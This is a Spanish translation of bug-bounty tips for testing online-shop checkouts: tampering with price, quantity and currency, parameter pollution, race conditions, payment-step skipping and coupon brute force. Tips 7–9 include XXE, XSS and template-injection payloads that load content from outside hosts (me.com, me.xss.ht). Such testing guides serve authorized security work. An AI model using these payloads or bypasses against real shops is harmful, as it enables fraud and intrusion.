Hola a continuación muestro algunos TIPS que se pueden utilizar cuando se practica Bug Bounty.
Todas estas entradas pertenecen al autor @0xAwali. Solo hemos traducido al español, resumido en algunas partes y añadido en otras referencias y explicaciones que no están en el artículo original.
#OnlineShoopBountie TIP #1 Trate de manipular la cantidad. Ejemplo: si la cantidad original es 1, intente cambiarla a 3 para obtener dos artículos gratis.
#OnlineShoopBountie TIP #2 Intente manipular el precio. Ejemplo: si el precio original es 10, intente cambiarlo a -10 o al valor de la fracción, 0.10 para obtener el artículo más barato.
#OnlineShoopBountie TIP #3 Intente manipular la moneda. Si la moneda original es el dólar, intente cambiarlo a INR (ó MXN) para obtener el artículo más barato.
#OnlineShoopBountie TIP #4 Intente usar números negativos, cero, NaN, null o un montón de 00000 en los valores de los parámetros. Ejemplo: cantidad=0000 O Cantidad=null para causar problemas lógicos.
#OnlineShoopBountie TIP #5 Intente utilizar la técnica HTTP Parameter Pollution. Ejemplo cantidad=1&cantidad=2 ,,, ó cantidad=[] con todos los parámetros para obtener artículos gratis.
#OnlineShoopBountie TIP #6 Elimine parámetros o cámbielos por nulo para causar problemas lógicos.
#OnlineShoopBountie TIP #7 Intente forzar el content-type desde JSON a XML Content–Type: application/xml para realizar ataques XXE <!DOCTYPE test [<!ENTITY xxe SYSTEM «http://me.com/xxe.dtd» >]>.
#OnlineShoopBountie TIP #8 Inyecte ataques de XSS «><svg/onload=prompt(1)> o blind XSS «><img src=//me.xss.ht> en todos los parámetros de la compra.
#OnlineShoopBountie TIP #9 Inyecte ataques de Blind XSS o Blind Template Injection en el user-agent o en cabeceras como X-Forwarded-For que toman la IP del usuario. Ejemplo: {{constructor.constructor(‘import(«http://me.xss.ht«)’)()}}
#OnlineShoopBountie TIP #10 Inyecte caracteres %00 Y %FF en todos los valores de los parámetros de la compra para causar errores intencionales que pueden exponer información confidencial.
#OnlineShoopBountie TIP #11 Inserte una gran longitud de caracteres o números en todos los valores de los parámetros. Ejemplo: cantidad=10000000000000000000000000000000000000000000000000000 para causar errores que puedan exponer información confidencial.
#OnlineShoopBountie TIP #12 Si la aplicación utiliza transferencias de una cuenta A hacia una cuenta B, intente ejecutar una condición de carrera (race condition).Pasos para reproducir:1. Intercepte la solicitud HTTP de transferencia con una herramienta proxy como BurpSuite.2. Envíe la solicitud a Turbo Intruder para ejecutar la condición de carrera.Nota: también puede realizar condiciones de carrera en el módulo Intruder de BurpSuite utilizando varios hilos.
Manual: https://krevetk0.medium.com/how-to-check-race-conditions-in-web-applications-338f73937992
#OnlineShoopBountie TIP #13 Verifique los distintos pasos y flujos del proceso de la compra de un producto. Si la aplicación ejecuta primero el proceso de pago, y al final ejecuta por separado la confirmación de compra, intente saltar los pasos de este flujo, ejecutando únicamente la solicitud HTTP que realiza la confirmación de compra y no pagará nada.
#OnlineShoopBountie TIP #14 Si la aplicación maneja cupones de descuento, verifique si es susceptible a ataques de fuerza bruta ya que pueden ser descubiertos. Si el cupón utiliza solo números (no letras, no caracteres) y tiene una longitud corta tenga, por seguro que encontrará un cupón válido utilizando un ataque de fuerza bruta mediante un script de python o bien utilizando el módulo intruder de BurpSuite.
Manuales: https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types https://portswigger.net/burp/documentation/desktop/tutorials/brute-forcing-a-login-using-burp-intruder